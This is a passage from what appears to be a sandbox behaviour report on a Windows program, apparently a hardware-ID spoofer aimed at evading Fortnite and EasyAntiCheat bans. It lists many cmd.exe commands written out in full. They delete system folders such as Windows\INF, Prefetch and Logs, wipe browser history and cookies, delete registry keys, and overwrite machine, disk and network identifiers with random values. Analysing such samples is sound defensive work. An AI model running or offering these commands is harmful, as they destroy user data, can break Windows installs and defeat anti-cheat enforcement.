    PID:5400
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OneDrive.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:5520
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\CloudStore
    3⤵
    PID:5528
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\FortniteGame\Saved
    3⤵
    PID:5612
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\Explorer\IconCacheToDelete
    3⤵
    PID:5748
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\INF
    3⤵
    - Drops file in Windows directory
    PID:5928
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /s /f /a:h /a:a /d C:\MSOCache\{71230000_00E2-0000-1000-00000000}\Setup.dat
    3⤵
    PID:1084
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:1628
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:5748
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive\NSALCache
    3⤵
    PID:5752
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Prefetch
    3⤵
    PID:5828
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5612
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
    3⤵
    PID:5652
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\System\CurrentControlSet\Control\TimeZoneInformation /f
      4⤵
      PID:5308
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWAREMicrosoft\Windows" "NT\CurrentVersion\Notifications\Data /v 418A073AA3BC3475 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:3612
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWAREMicrosoft\Windows" "NT\CurrentVersion\Notifications\Data /v 418A073AA3BC3475 /t REG_BINARY /d 2042224092279211594315579120783143044924146912165622571 /f
      4⤵
      Modifies registry key
      PID:652
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\D3DSCache
    3⤵
    PID:2796
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\CrashReportClient
    3⤵
    PID:2388
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
    3⤵
    PID:5372
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
      4⤵
      Checks processor information in registry
      PID:3424
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\temp
    3⤵
    PID:5720
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:4428
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 2042224092279211594315579120783143044924146912165622571 /f
      4⤵
      Modifies registry key
      PID:4612
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\Logs
    3⤵
    PID:5396
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:2132
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d DESKTOP-20422 /f
      4⤵
      PID:4660
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\SettingSync\metastore
    3⤵
    PID:3548
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:5552
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d DESKTOP-20422 /f
      4⤵
      Modifies registry key
      PID:828
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\SoftwareDistribution\DataStore\Logs
    3⤵
    PID:1884
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:1704
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 20422-24092-2792-11594 /f
      4⤵
      PID:5600
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\Microsoft\Windows\WER\Temp
    3⤵
    PID:2780
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {%random%-%random} /f
    3⤵
    PID:1968
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d {20422-%random} /f
      4⤵
      PID:4852
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD\DxCache
    3⤵
    PID:5932
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d %random%%random%%random% /f
    3⤵
    PID:3860
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\HardwareConfig\Current /v BaseBoardProduct /t REG_SZ /d 20425207320656 /f
      4⤵
      Modifies registry key
      PID:3168
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\USOShared\Logs
    3⤵
    PID:5756
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d %random% /f
    3⤵
    PID:4800
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d 20425 /f
      4⤵
      Modifies registry key
      PID:3552
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h / a : a / q %systemdrive%\Users\username%\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\*.*
    3⤵
    PID:5636
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h / a : a / q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\WebCache\*.*
    3⤵
    PID:5652
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d %random% /f
    3⤵
    PID:5648
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d 20425 /f
      4⤵
      PID:4336
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\AC
    3⤵
    PID:292
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d %random%%random%%random% /f
    3⤵
    PID:4872
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\BIOS /v BaseBoardProduct /t REG_SZ /d 20425207320656 /f
      4⤵
      Enumerates system info in registry
      PID:5676
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache
    3⤵
    PID:5500
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:3208
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {20425-2073-206562889} /f
      4⤵
      PID:5544
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\Settings
    3⤵
    PID:4612
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\Engine\Plugins
    3⤵
    PID:5508
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:756
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {20425-2073-206562889} /f
      4⤵
      Modifies registry key
      PID:3952
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Plugins
    3⤵
    PID:216
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:5408
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d {20425-2073-206562889} /f
      4⤵
      PID:5516
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\PersistentDownloadDir
    3⤵
    PID:5340
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:8
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d 20425-2073-206562889 /f
      4⤵
      Modifies registry key
      PID:5628
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:5892
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:4852
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 20425-2073-206562889 /f
      4⤵
      PID:544
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Roaming\EasyAntiCheat
    3⤵
    PID:5820
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5752
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2020
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLab /t REG_SZ /d 20425-2073-206562889 /f
      4⤵
      Modifies registry key
      PID:5308
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\NetworksCache
    3⤵
    PID:5784
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:1640
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 20429-12821-575226952 /f
      4⤵
      PID:3160
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C del /f /s /q %systemdrive%\ProgramData\Microsoft\DataMart\PaidWiFi\Rules
    3⤵
    PID:5912
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:2872
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 20429-12821-575226952 /f
      4⤵
      Modifies registry key
      PID:3696
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Cache
    3⤵
    PID:6048
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5828
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir / s / q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:5280
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:3056
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d 20429-12821-575226952 /f
      4⤵
      Enumerates system info in registry
      PID:5788
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\ProgramData\%username%\Microsoft\XboxLive
    3⤵
    PID:5692
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:840
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2388
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d 20429-12821-575226952 /f
      4⤵
      Enumerates system info in registry
      Modifies registry key
      PID:4216
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\Public\Documents
    3⤵
    PID:4612
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:3480
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {20429-12821-575226952} /f
      4⤵
      PID:756
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\NVIDIA Corporation
    3⤵
    PID:2408
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:5512
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5396
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {20429-12821-575226952} /f
      4⤵
      PID:5580
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /a:h /a:a /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\XboxLive\*.*
    3⤵
    PID:220
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:5016
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d DESKTOP-20429 /f
      4⤵
      Modifies registry key
      PID:1884
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Program Files\Epic Games\Fortnite\FortniteGame\Config
    3⤵
    PID:5600
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %random% /f
    3⤵
    PID:5772
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 20429 /f
      4⤵
      Modifies registry key
      PID:544
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Temp
    3⤵
    PID:5768
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d %random% /f
    3⤵
    PID:6000
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1968
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d 20429 /f
      4⤵
      PID:5308
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCache
    3⤵
    PID:5532
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-%random% /f
    3⤵
    PID:5752
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d DESKTOP-20429 /f
      4⤵
      Modifies registry key
      PID:3160
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies
    3⤵
    PID:3104
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5784
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:2816
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {20429-12821-5752-2695219419} /f
      4⤵
      PID:2304
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IEDownloadHistory
    3⤵
    PID:5304
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatUaCache
    3⤵
    PID:4084
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:652
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {%random%-%random%-%random%-%random%%random%} /f
    3⤵
    PID:3612
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v GUID /t REG_SZ /d {20429-12821-5752-2695219419} /f
      4⤵
      Modifies registry key
      PID:5684
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\IECompatCache
    3⤵
    PID:5372
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %random% /f
    3⤵
    PID:3056
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5192
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 20432 /f
      4⤵
      PID:5440
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\DNTException
    3⤵
    PID:5804
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d %random% /f
    3⤵
    PID:972
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOwner /t REG_SZ /d 20432 /f
      4⤵
      PID:4856
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\INetCookies\PrivacIE
    3⤵
    PID:4472
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d %random% /f
    3⤵
    PID:3480
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v REGisteredOrganization /t REG_SZ /d 20432 /f
      4⤵
      Modifies registry key
      PID:5552
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History
    3⤵
    PID:5524
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:216
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 20432-23569-23617-18248 /f
      4⤵
      PID:5584
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Windows\History\Low
    3⤵
    PID:3544
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5516
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:2220
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 20432-23569-23617-18248 /f
      4⤵
      PID:2700
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\Intel
    3⤵
    PID:5600
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d %random%-%random%-%random%-%random% /f
    3⤵
    PID:5840
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5748
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 20432-23569-23617-18248 /f
      4⤵
      PID:5656
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Windows\system_no_output32\config\system_no_outputprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData
    3⤵
    PID:296
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4160
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:1968
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d %random% /f
    3⤵
    PID:5820
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_SZ /d 20432 /f
      4⤵
      PID:5320
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds Cache
    3⤵
    PID:5620
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d %random% /f
    3⤵
    PID:1640
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_SZ /d 20432 /f
      4⤵
      Modifies registry key
      PID:4872
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\EpicGamesLauncher
    3⤵
    PID:5716
- - C:\Windows\System32\cmd.exe
